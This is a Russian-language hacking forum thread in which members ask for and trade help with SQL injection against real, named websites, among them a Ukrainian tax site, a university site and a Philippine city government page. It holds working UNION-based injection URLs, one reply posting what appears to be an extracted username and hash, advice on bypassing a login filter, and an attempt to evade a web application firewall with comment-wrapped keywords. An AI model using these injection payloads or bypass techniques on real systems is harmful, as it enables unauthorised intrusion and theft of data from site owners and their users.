Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    94
    Likes Received:
    3
    Reputations:
    -6
    Well received, thank you.
     
  2. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    63
    Likes Received:
    6
    Reputations:
    0
    подскажите, вот есть запрос:
    показывает имена всех таблиц.
    такой запрос:
    покажет имена баз данных в которых есть таблица с именем 0х0000?
    ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886

    where table name='имя таблицы' and table_schema='имя_базы'

    пора уже взятся за учебник SQL..
     
    _________________________
    4 people like this.
  4. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    119
    Likes Received:
    34
    Reputations:
    55
    Есть такой вот фильтр
    PHP:
    $filter[3] = array( "select""delete""union""update""insert""\\""'"","";""--""-""%20""%27"" ""`""=""%" );
    $data str_replace$filter[$op], ""strtolower$data ) );
    И есть запрос в бд в котором он обрабатывает объект
    PHP:
    $db->Query "SELECT * FROM admin WHERE login='" $this->adm_name "'" );
    Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
     
  5. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    46
    Likes Received:
    42
    Reputations:
    48
    Ничего ты тут не сделаешь

    UPD
    Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )
     
    #18505 KolosJey, 3 Dec 2011
    Last edited: 3 Dec 2011
  6. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    119
    Likes Received:
    34
    Reputations:
    55
    Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку
    PHP:
        $sel $db->Query "SELECT * FROM admin WHERE login='" $this->adm_name "'" );
            
                            if (
    $db->NumRows $sel )) {
                                
    $this->adm_data $db->FetchArray $sel );
                                if (
    $this->adm_data ['password'] == $this->adm_pass) {
                                    
    $_SESSION ['acplogin'] = $this->adm_data ['login'];
                                    
    $_SESSION ['acppass'] = $this->adm_data ['password'];
                                    
    $this->redirect "admin.php" );
                                } else {
                                    
    $this->redirect "admin.php?err=pError" );
                                } 
    все портит эта кавычка :(
     
  7. SHADOW785

    SHADOW785 New Member

    Joined:
    1 Nov 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Vbulletin 4.1.7
    Code:
    http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='
    Можно ли из этого что-то извлечь?
     
  8. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    374
    Likes Received:
    250
    Reputations:
    27
    Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user
     
  9. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Code:
    http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
    Не шарю как вывести :mad:
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+


    что вывести то?
     
    1 person likes this.
  11. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые... :D
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273

    natasha:0444730b0844225c

    что именно понять то?
     
    2 people like this.
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    бляяяя Я не увидел где оно выводит :D.
    Gorev, спасибо!
     
    2 people like this.
  14. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Code:
    http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
    :eek:
     
    1 person likes this.
  15. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    457
    Likes Received:
    80
    Reputations:
    16
    Code:
    www.guu.ru/info.php?id=-1+order+by+1+--+
    Не получается раскрутить.
     
  16. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    374
    Likes Received:
    250
    Reputations:
    27
    Иньекции нету
     
  17. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие ;)
    HTML:
    http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f
     
    1 person likes this.
  18. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    169
    Likes Received:
    9
    Reputations:
    6
    Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:
    Code:
    http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4
    На этой странице выдало:
    Code:
    Site.com Driver Error
    
    There appears to be an error with the database.
    
    If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.
    
    You can try to refresh the page by clicking here 
    Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь?
     
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    94
    Likes Received:
    3
    Reputations:
    -6
    I have a problem here.

    Code:
    http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8
    Code:
    WebKnight Application Firewall Alert
    
    
    Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.
    
    What is WebKnight?
    AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.
    
    
    For more information on WebKnight: http://www.aqtronix.com/WebKnight/
    
    AQTRONIX WebKnight
    How do I execute?
     
  20. BlooD_BASH

    BlooD_BASH New Member

    Joined:
    3 Dec 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    XSS

    У меня такой нубский вопрос...
    Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?
     
Loading...
Thread Status:
Not open for further replies.